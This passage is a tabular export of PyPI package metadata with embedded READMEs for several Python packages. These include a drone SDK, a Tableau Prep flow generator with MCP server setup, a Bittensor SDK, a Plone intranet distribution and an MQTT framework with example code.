"cbor2",
"pyzstd; extra == \"zstandard\"",
"pytest; extra == \"tests\""
] | [] | [] | [] | [
"Homepage, https://hydra.ecd.space/ecd/vocker/",
"Changelog, https://hydra.ecd.space/ecd/vocker/file?name=CHANGELOG.md&ci=trunk"
] | twine/6.1.0 CPython/3.13.5 | 2026-02-20T08:59:12.442280 | vocker-0.6.2.tar.gz | 75,985 | 5c/17/a8c5ac81ef126cdc3821ba7d3399e02cb0641c7327066ae39ad8b504ae5a/vocker-0.6.2.tar.gz | source | sdist | null | false | 35f3cca750f1dbc11cbc000be91542cc | 038f5617973375adaaea4e428cd3fde807d4290f149cb36d820dc711b4dcac3a | 5c17a8c5ac81ef126cdc3821ba7d3399e02cb0641c7327066ae39ad8b504ae5a | null | [] | 214 |
2.4 | pmini_sdk | 2.0.1 | Python SDK for Pmini quadcopter | # Pmini SDK Python
## Get started
```bash
python -m venv venv
```
```bash
source venv/bin/activate
```
```
poetry build
```
```
pip install ./dist/pmini-0.0.0-py3-none-any.whl --force-reinstall
```
## Examples
After installing the package, go to the examples folder and run any of the examples
```
cd examples
```
Run example
```
python3 takeoff.py
```
# Integration Tests for Pmini SDK
This directory contains integration tests for the Pmini SDK Python library.
## Test Structure
- `conftest.py` - Pytest configuration and fixtures
- `test_basic.py` - Basic tests that don't require simulation
- `test_connection.py` - Connection tests that require simulation
- `run_integration_tests.py` - Test runner script
## Prerequisites
1. Install dependencies:
```bash
pip install pytest pytest-cov
```
2. Install the SDK:
```bash
pip install -e .
```
## Running Tests
### Note
For the integration testing, autopilot simulation is required.
You can use this repository to start the simulation: https://gitlab.com/regislab/pathfindermini/pf_mini_gazebo
```bash
git clone git@gitlab.com:regislab/pathfindermini/pf_mini_gazebo.git && cd pf_mini_gazebo
```
Launch the simulation with the following command
```bash
make run
```
### Basic Tests (No Simulation Required)
```bash
# Run basic tests only
python -m pytest test/test_basic.py -v
# Or use the test runner
python test/run_integration_tests.py --test-path test/test_basic.py
```
### Connection Tests (Requires Simulation)
```bash
# Start your simulation container first, then:
python -m pytest test/test_connection.py -v
```
### All Tests
```bash
# Run all tests
python -m pytest test/ -v
```
### With Markers
```bash
# Run only integration tests
python -m pytest test/ -m integration
# Run only connection tests
python -m pytest test/ -m connection
# Exclude slow tests
python -m pytest test/ -m "not slow"
```
## Test Configuration
The tests are configured to connect to a simulation running on:
- Host: `192.168.4.1`
- Port: `8080`
- Protocol: `UDP`
You can modify the connection settings in `conftest.py` if your simulation uses different parameters.
## Test Categories
### Basic Tests (`test_basic.py`)
- SDK import verification
- Configuration object creation
- Enum availability
- Logging setup
### Connection Tests (`test_connection.py`)
- Connection establishment
- Connection stability
- MAVLink client functionality
- Optical flow data availability
- Connection timeout handling
- Connection recovery
## Adding New Tests
1. Create a new test file: `test_<feature>.py`
2. Use the existing fixtures from `conftest.py`
3. Add appropriate markers to your tests
4. Follow the existing test patterns
Example:
```python
import pytest
import logging
class TestNewFeature:
@pytest.mark.integration
def test_new_feature(self, pmini_instance, wait_for_connection):
logger = logging.getLogger(__name__)
logger.info("Testing new feature")
# Your test logic here
assert True
logger.info("✅ New feature test passed")
```
## Troubleshooting
### Connection Timeout
If tests fail with connection timeout:
1. Ensure your simulation container is running
2. Check that the simulation is listening on the correct port
3. Verify network connectivity between test environment and simulation
### Import Errors
If you get import errors:
1. Make sure the SDK is installed: `pip install -e .`
2. Check that all dependencies are installed: `pip install -r requirements.txt`
### Test Failures
- Check the logs for detailed error messages
- Use `-v` flag for verbose output
- Use `-s` flag to see print statements
| text/markdown | RegisLab | null | null | null | Proprietary | drone, quadcopter, zenoh, sdk | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: Other/Proprietary License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Scientific/Engineering",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | <4.0,>=3.9 | [] | [] | [] | [
"dash==2.17.1",
"eclipse-zenoh<1.8,>=1.7",
"plotly==5.22.0"
] | [] | [] | [] | [
"Homepage, https://github.com/RegisLab/pmini-sdk",
"Repository, https://github.com/RegisLab/pmini-sdk"
] | poetry/2.3.2 CPython/3.12.12 Linux/6.17.0-14-generic | 2026-02-20T08:58:55.212724 | pmini_sdk-2.0.1-py3-none-any.whl | 26,412 | 50/55/6bbbd8a911b9ef4c402a46f74c5c2ae50f71aaa10ee97d5c00d418cfc515/pmini_sdk-2.0.1-py3-none-any.whl | py3 | bdist_wheel | null | false | 184f0957ea1b901e59039d0aad802ff7 | ec7466773fc00282b6ec7235a3dc6cf0b9c9e3828a889ef75306c27506fd5f0b | 50556bbbd8a911b9ef4c402a46f74c5c2ae50f71aaa10ee97d5c00d418cfc515 | null | [] | 0 |
2.3 | cwprep | 0.3.0 | Tableau Prep Flow SDK - Programmatically generate .tfl files | # cwprep - Tableau Prep Flow SDK
A Python SDK for programmatically generating Tableau Prep data flow (.tfl) files. Built through reverse-engineering the TFL JSON structure, enabling flow creation and modification via code without opening the GUI.
## Installation
```bash
pip install cwprep
```
## Quick Start
```python
from cwprep import TFLBuilder, TFLPackager
# Create builder
builder = TFLBuilder(flow_name="My Flow")
# Add database connection
conn_id = builder.add_connection(
host="localhost",
username="root",
dbname="mydb"
)
# Add input tables
orders = builder.add_input_table("orders", "orders", conn_id)
customers = builder.add_input_table("customers", "customers", conn_id)
# Join tables
joined = builder.add_join(
name="Orders + Customers",
left_id=orders,
right_id=customers,
left_col="customer_id",
right_col="customer_id",
join_type="left"
)
# Add output
builder.add_output_server("Output", joined, "My_Datasource")
# Build and save
flow, display, meta = builder.build()
TFLPackager.save_to_folder("./output", flow, display, meta)
TFLPackager.pack_zip("./output", "./my_flow.tfl")
```
## Features
| Feature | Method | Description |
|---------|--------|-------------|
| Database Connection | `add_connection()` | Connect to MySQL/PostgreSQL/Oracle |
| SQL Input | `add_input_sql()` | Custom SQL query input |
| Table Input | `add_input_table()` | Direct table connection |
| Join | `add_join()` | left/right/inner/full joins |
| Union | `add_union()` | Merge multiple tables |
| Filter | `add_filter()` | Expression-based filter |
| Value Filter | `add_value_filter()` | Keep/exclude by values |
| Keep Only | `add_keep_only()` | Select columns |
| Remove Columns | `add_remove_columns()` | Drop columns |
| Rename | `add_rename()` | Rename columns |
| Calculation | `add_calculation()` | Tableau formula fields |
| Quick Calc | `add_quick_calc()` | Quick clean (lowercase/uppercase/trim/remove) |
| Change Type | `add_change_type()` | Change column data types |
| Duplicate Column | `add_duplicate_column()` | Duplicate (copy) a column |
| Aggregate | `add_aggregate()` | GROUP BY with SUM/AVG/COUNT |
| Pivot | `add_pivot()` | Rows to columns |
| Unpivot | `add_unpivot()` | Columns to rows |
| Output | `add_output_server()` | Publish to Tableau Server |
## Examples
See the `examples/` directory for complete demos:
- `demo_basic.py` - Input, Join, Output
- `demo_cleaning.py` - Filter, Calculate, Rename
- `demo_aggregation.py` - Union, Aggregate, Pivot
- `demo_comprehensive.py` - All features combined
## MCP Server
cwprep includes a built-in [Model Context Protocol](https://modelcontextprotocol.io/) server, enabling AI clients (Claude Desktop, Cursor, Gemini CLI, etc.) to generate TFL files directly.
### Prerequisites
| Method | Requirement |
|--------|-------------|
| `uvx` (recommended) | Install [uv](https://docs.astral.sh/uv/getting-started/installation/) — it auto-downloads `cwprep[mcp]` in an isolated env |
| `pip install` | Python ≥ 3.8 + `pip install cwprep[mcp]` |
### Quick Start
```bash
# Local (stdio)
cwprep-mcp
# Remote (Streamable HTTP)
cwprep-mcp --transport streamable-http --port 8000
```
### Client Configuration
All clients below use the **`uvx` method** (recommended). Replace `uvx` with `cwprep-mcp` if you prefer a local `pip install`.
<details>
<summary><b>Claude Desktop</b></summary>
Edit config file:
- **Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
- **macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
```json
{
"mcpServers": {
"cwprep": {
"command": "uvx",
"args": ["--from", "cwprep[mcp]", "cwprep-mcp"]
}
}
}
```
</details>
<details>
<summary><b>Cursor</b></summary>
Settings → MCP → Add new MCP server, or edit `~/.cursor/mcp.json`:
```json
{
"mcpServers": {
"cwprep": {
"command": "uvx",
"args": ["--from", "cwprep[mcp]", "cwprep-mcp"]
}
}
}
```
</details>
<details>
<summary><b>VS Code (Copilot)</b></summary>
Create `.vscode/mcp.json` in project root:
```json
{
"servers": {
"cwprep": {
"command": "uvx",
"args": ["--from", "cwprep[mcp]", "cwprep-mcp"]
}
}
}
```
</details>
<details>
<summary><b>Windsurf (Codeium)</b></summary>
Edit `~/.codeium/windsurf/mcp_config.json`:
```json
{
"mcpServers": {
"cwprep": {
"command": "uvx",
"args": ["--from", "cwprep[mcp]", "cwprep-mcp"]
}
}
}
```
</details>
<details>
<summary><b>Claude Code (CLI)</b></summary>
```bash
claude mcp add cwprep -- uvx --from "cwprep[mcp]" cwprep-mcp
```
</details>
<details>
<summary><b>Gemini CLI</b></summary>
Edit `~/.gemini/settings.json`:
```json
{
"mcpServers": {
"cwprep": {
"command": "uvx",
"args": ["--from", "cwprep[mcp]", "cwprep-mcp"]
}
}
}
```
</details>
<details>
<summary><b>Continue (VS Code / JetBrains)</b></summary>
Edit `~/.continue/config.yaml`:
```yaml
mcpServers:
- name: cwprep
command: uvx
args:
- --from
- cwprep[mcp]
- cwprep-mcp
```
</details>
<details>
<summary><b>Remote HTTP Mode (any client)</b></summary>
Start the server:
```bash
cwprep-mcp --transport streamable-http --port 8000
```
Then configure your client with the endpoint: `http://your-server-ip:8000/mcp`
</details>
### Available MCP Capabilities
| Type | Name | Description |
|------|------|-------------|
| 🔧 Tool | `generate_tfl` | Generate .tfl file from flow definition |
| 🔧 Tool | `list_supported_operations` | List all supported node types |
| 🔧 Tool | `validate_flow_definition` | Validate flow definition before generating |
| 📖 Resource | `cwprep://docs/api-reference` | SDK API reference |
| 📖 Resource | `cwprep://docs/calculation-syntax` | Tableau Prep calculation syntax |
| 💬 Prompt | `design_data_flow` | Interactive flow design assistant |
| 💬 Prompt | `explain_tfl_structure` | TFL file structure explanation |
## AI Skill Support
This project includes a specialized AI Skill for assistants like Claude or Gemini to help you build flows.
- **Location**: `.agents/skills/tfl-generator/`
- **Features**: Procedural guidance for flow construction, API reference, and Tableau Prep calculation syntax rules.
## Directory Structure
```
cwprep/
├── .agents/skills/ # AI Agent skills and technical references
├── src/cwprep/ # SDK source code
│ ├── builder.py # TFLBuilder class
│ ├── packager.py # TFLPackager class
│ ├── config.py # Configuration utilities
│ └── mcp_server.py # MCP Server (Tools, Resources, Prompts)
├── examples/ # Demo scripts
├── docs/ # Documentation
└── tests/ # Unit tests
```
## Configuration
Create `config.yaml` for default settings:
```yaml
database:
host: localhost
username: root
dbname: mydb
port: "3306"
db_class: mysql
tableau_server:
url: http://your-server
project_name: Default
```
## Changelog
See [changelog.md](changelog.md) for version history.
## License
MIT License
| text/markdown | cooper wenhua | null | null | null | MIT | data-engineering, data-pipeline, etl, tableau, tableau-prep, tfl | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Database",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"cffi<2.0.0,>=1.0.0; extra == \"all\"",
"mcp<2,>=1.25; extra == \"all\"",
"python-dotenv>=1.0; extra == \"all\"",
"pyyaml>=6.0; extra == \"all\"",
"build>=1.0; extra == \"dev\"",
"cffi<2.0.0,>=1.0.0; extra == \"dev\"",
"mcp<2,>=1.25; extra == \"dev\"",
"pytest>=7.0; extra == \"dev\"",
"python-dotenv>=1.0; extra == \"dev\"",
"pyyaml>=6.0; extra == \"dev\"",
"python-dotenv>=1.0; extra == \"dotenv\"",
"cffi<2.0.0,>=1.0.0; extra == \"mcp\"",
"mcp<2,>=1.25; extra == \"mcp\"",
"pyyaml>=6.0; extra == \"yaml\""
] | [] | [] | [] | [
"Homepage, https://github.com/imgwho/cwprep",
"Documentation, https://github.com/imgwho/cwprep#readme",
"Repository, https://github.com/imgwho/cwprep.git",
"Issues, https://github.com/imgwho/cwprep/issues"
] | twine/6.2.0 CPython/3.13.1 | 2026-02-20T08:58:39.521314 | cwprep-0.3.0.tar.gz | 22,114 | 8e/81/93ccf01ccbfabb1e53fb2fccbc2bfc7b29c6a81e141c029c3c0379c3465e/cwprep-0.3.0.tar.gz | source | sdist | null | false | dad9def828086a64ca298a6ba4abe4fa | d68b94a0dd41a2ec8d84a470d93e79170c5eb207e279d364353997a5447b2e81 | 8e8193ccf01ccbfabb1e53fb2fccbc2bfc7b29c6a81e141c029c3c0379c3465e | null | [] | 228 |
2.4 | turbobt | 1.0.1.dev3 | A next generation Bittensor SDK, for Python 3. | # turbobt
A next generation Bittensor SDK, for Python 3.
# Releasing
Building and deploying to pypi is done via Gtihub Actions. To release a new version do:
```
git tag vX.Y.Z
git push origin vX.Y.Z
```
| text/markdown | null | Reef Technologies <opensource@reef.pl> | null | null | null | null | [
"Development Status :: 2 - Pre-Alpha",
"Framework :: AsyncIO",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"bittensor-drand~=1.0.0",
"bittensor-wallet~=4.0.0",
"eciespy~=0.4.6",
"httpx~=0.26.0",
"scalecodec~=1.2.11",
"websockets~=14.1",
"xxhash~=3.5.0"
] | [] | [] | [] | [
"Homepage, https://github.com/bactensor/turbobt",
"Issues, https://github.com/bactensor/turbobt/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T08:58:23.970146 | turbobt-1.0.1.dev3.tar.gz | 136,877 | c9/26/08bf1888897dadbb90448cb9ec367d06c5a97253f1060a597dc754db2007/turbobt-1.0.1.dev3.tar.gz | source | sdist | null | false | 9a2ab1939d2a943f2dc4ff8fd6c306a5 | 22d2af5a77dbbdc401b6475869e45dce8f1eeca6849881d8aeef41c5e1d7773c | c92608bf1888897dadbb90448cb9ec367d06c5a97253f1060a597dc754db2007 | BSD-3-Clause | [
"LICENSE"
] | 169 |
2.4 | kitconcept.intranet | 1.0.0b28 | A Plone distribution for Intranets with Plone. Created by kitconcept. | # kitconcept.intranet
A Plone distribution for Intranets with Plone. Created by kitconcept.
## Installation
Install kitconcept.intranet with `pip`:
```shell
pip install kitconcept.intranet
```
And to create the Plone site:
```shell
make create_site
```
## Contribute
- [Issue Tracker](https://github.com/kitconcept/kitconcept.intranet/issues)
- [Source Code](https://github.com/kitconcept/kitconcept.intranet/)
## License
The project is licensed under GPLv2.
## Credits and Acknowledgements 🙏
Crafted with care by **This was generated by [cookiecutter-plone](https://github.com/plone/cookieplone-templates/backend_addon) on 2024-05-28 22:07:17**. A special thanks to all contributors and supporters!
| text/markdown | null | kitconcept GmbH <info@kitconcept.com> | null | null | null | CMS, Intranet, Plone, Python | [
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Framework :: Plone",
"Framework :: Plone :: 6.1",
"Framework :: Plone :: Distribution",
"License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.12"
] | [] | null | null | ==3.12.* | [] | [] | [] | [
"kitconcept-core==1.0.6",
"kitconcept-solr==2.0.0a3",
"pas-plugins-authomatic==2.0.0",
"pas-plugins-keycloakgroups==1.0.0b1",
"pas-plugins-oidc==2.0.0",
"plone-api",
"plone-distribution",
"plone-restapi",
"plone-volto>=5.1.0",
"python-dateutil",
"redturtle-rssservice==2.2.0"
] | [] | [] | [] | [
"Homepage, https://github.com/kitconcept/kitconcept.intranet",
"PyPI, https://pypi.python.org/pypi/kitconcept.intranet",
"Source, https://github.com/kitconcept/kitconcept.intranet",
"Tracker, https://github.com/kitconcept/kitconcept.intranet/issues"
] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T08:57:51.970056 | kitconcept_intranet-1.0.0b28.tar.gz | 71,316,039 | 76/aa/b4e806514ce995169b2d57167f93e50a351f6b53951b41b5dc93180976ab/kitconcept_intranet-1.0.0b28.tar.gz | source | sdist | null | false | ef9723f88b6fd2e1a1712e4ae4f494e2 | 18a007063c23af33e6a0150e6905c4f42ffe1db18b6e59f22af8aa917d0e8f18 | 76aab4e806514ce995169b2d57167f93e50a351f6b53951b41b5dc93180976ab | MIT | [
"LICENSE.GPL",
"LICENSE.md"
] | 0 |
2.4 | fastcc | 5.2.2 | Lightweight, efficient and developer-friendly framework for mqtt communication. | <p align="center">
<img
src="https://github.com/ReMi-HSBI/fastcc/blob/main/docs/src/static/images/logos/fastcc.svg?raw=true"
alt="FastCC Logo"
width="33%"
/>
</p>
# FastCC
<a href="https://docs.astral.sh/ruff">
<img
src="https://img.shields.io/badge/ruff-⚡-261230.svg?style=flat-square"
alt="Ruff"
/>
</a>
<a href="https://mypy-lang.org">
<img
src="https://img.shields.io/badge/mypy-📝-2a6db2.svg?style=flat-square"
alt="Mypy"
/>
</a>
<a href="https://gitmoji.dev">
<img
src="https://img.shields.io/badge/gitmoji-😜%20😍-FFDD67.svg?style=flat-square"
alt="Gitmoji"
/>
</a>
FastCC is a [Python](https://www.python.org) package that simplifies
[MQTT](https://mqtt.org) communication using decorators. With its
intuitive `@route` system, developers can quickly define MQTT message
handlers without boilerplate code. FastCC natively supports
[Protocol Buffers](https://protobuf.dev) :boom:, automatically handling
serialization to byte format for efficient and structured data exchange.
- Lightweight :zap:
- Efficient :rocket:
- Developer-friendly :technologist:
This project is built on top of [aiomqtt](https://github.com/empicano/aiomqtt)
which itself is built on top of [paho-mqtt](https://eclipse.dev/paho).
# Examples
## client.py
```python
import asyncio
import contextlib
import logging
import os
import sys
import fastcc
_logger = logging.getLogger(__name__)
async def main() -> None:
"""Run the app."""
logging.basicConfig(level=logging.DEBUG)
async with fastcc.Client("localhost") as client:
try:
response = await client.request(
"greet/doe",
"Charlie",
response_type=str,
)
except fastcc.RequestError as e:
details = f"An error occurred on the server: {e}"
_logger.error(details)
response = await client.request("greet/doe", "Alice", response_type=str)
_logger.info("response: %r", response)
loop_factory: type[asyncio.AbstractEventLoop] | None = None
# See: https://github.com/empicano/aiomqtt#note-for-windows-users
if sys.platform.lower() == "win32" or os.name.lower() == "nt":
loop_factory = asyncio.SelectorEventLoop
with contextlib.suppress(KeyboardInterrupt):
asyncio.run(main(), loop_factory=loop_factory)
```
## app.py
```python
import asyncio
import contextlib
import logging
import os
import sys
import fastcc
router = fastcc.Router()
@router.route("greet/{family}")
async def greet(packet: str, family: str, *, database: dict[str, int]) -> str:
"""Greet a user.
Parameters
----------
packet
The name of the user.
Autofilled by fastcc.
family
The family of the user.
Autofilled by fastcc.
database
The database.
Autofilled by fastcc.
Returns
-------
str
The greeting message.
"""
# ... do some async work
await asyncio.sleep(0.1)
database[packet] += 1
occurrence = database[packet]
return (
f"Hello, {packet} from the {family} family! Saw you {occurrence} times!"
)
async def main() -> None:
"""Run the app."""
logging.basicConfig(level=logging.DEBUG)
database: dict[str, int] = {"Alice": 0, "Bob": 0}
async with fastcc.Application("localhost") as app:
app.add_router(router)
app.add_injector(database=database)
app.add_exception_handler(
KeyError,
lambda e: fastcc.RequestError(repr(e), fastcc.Status.NOT_FOUND),
)
await app.run()
loop_factory: type[asyncio.AbstractEventLoop] | None = None
# See: https://github.com/empicano/aiomqtt#note-for-windows-users
if sys.platform.lower() == "win32" or os.name.lower() == "nt":
loop_factory = asyncio.SelectorEventLoop
with contextlib.suppress(KeyboardInterrupt):
asyncio.run(main(), loop_factory=loop_factory)
```
## stream_client.py
```python
import asyncio
import contextlib
import logging
import os
import sys
import fastcc
_logger = logging.getLogger(__name__)
async def main() -> None:
"""Run the app."""
logging.basicConfig(level=logging.DEBUG)
async with fastcc.Client("localhost") as client:
try:
async for response in client.stream(
"greet",
"Charlie",
response_type=str,
):
_logger.info("response: %r", response)
except fastcc.RequestError as e:
details = f"An error occurred on the server: {e}"
_logger.error(details)
async for response in client.stream(
"greet",
"Alice",
response_type=str,
):
_logger.info("response: %r", response)
loop_factory: type[asyncio.AbstractEventLoop] | None = None
# See: https://github.com/empicano/aiomqtt#note-for-windows-users
if sys.platform.lower() == "win32" or os.name.lower() == "nt":
loop_factory = asyncio.SelectorEventLoop
with contextlib.suppress(KeyboardInterrupt):
asyncio.run(main(), loop_factory=loop_factory)
```
## stream_app.py
```python
import asyncio
import contextlib
import logging
import os
import sys
from collections.abc import AsyncIterator # noqa: TC003
import fastcc
router = fastcc.Router()
@router.route("greet")
async def greet(
packet: str,
*,
database: dict[str, int],
) -> AsyncIterator[str]:
"""Greet a user.
Parameters
----------
packet
The name of the user.
Autofilled by fastcc.
database
The database.
Autofilled by fastcc.
Yields
------
str
The greeting message.
"""
# ... do some async work
await asyncio.sleep(0.1)
for _ in range(2):
database[packet] += 1
occurrence = database[packet]
yield f"Hello, {packet}! Saw you {occurrence} times!"
async def main() -> None:
"""Run the app."""
logging.basicConfig(level=logging.DEBUG)
database: dict[str, int] = {"Alice": 0, "Bob": 0}
async with fastcc.Application("localhost") as app:
app.add_router(router)
app.add_injector(database=database)
app.add_exception_handler(
KeyError,
lambda e: fastcc.RequestError(repr(e), fastcc.Status.NOT_FOUND),
)
await app.run()
loop_factory: type[asyncio.AbstractEventLoop] | None = None
# See: https://github.com/empicano/aiomqtt#note-for-windows-users
if sys.platform.lower() == "win32" or os.name.lower() == "nt":
loop_factory = asyncio.SelectorEventLoop
with contextlib.suppress(KeyboardInterrupt):
asyncio.run(main(), loop_factory=loop_factory)
```
| text/markdown | null | "J. Baudisch" <justin.baudisch@hsbi.de> | null | "J. Baudisch" <justin.baudisch@hsbi.de> | null | mqtt, protobuf, aiomqtt, asyncio, iot | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Software Development",
"Topic :: Communications",
"Programming Language :: Python",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Typing :: Typed"
] | [] | null | null | >=3.14 | [] | [] | [] | [
"paho-mqtt",
"aiomqtt",
"protobuf",
"ruff; extra == \"dev\"",
"mypy; extra == \"dev\"",
"Sphinx; extra == \"dev\"",
"furo; extra == \"dev\"",
"types-protobuf; extra == \"dev\"",
"pytest; extra == \"dev\"",
"pytest-asyncio; extra == \"dev\""
] | [] | [] | [] | [
"Repository, https://github.com/ReMi-HSBI/fastcc"
] | twine/6.2.0 CPython/3.14.3 | 2026-02-20T08:57:42.510772 | fastcc-5.2.2.tar.gz | 19,700 | fe/12/20cb5331080c78c24d752185168ea6e71b4848d03b42cd743e6891fb6ab6/fastcc-5.2.2.tar.gz | source | sdist | null | false | b7e771d04ec2ca2e817e13e36773cef8 | 95baaa83e1e093ba837862706d7fd18e69e3532893885c9ab4bf4b834d849033 | fe1220cb5331080c78c24d752185168ea6e71b4848d03b42cd743e6891fb6ab6 | null | [] | 210 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.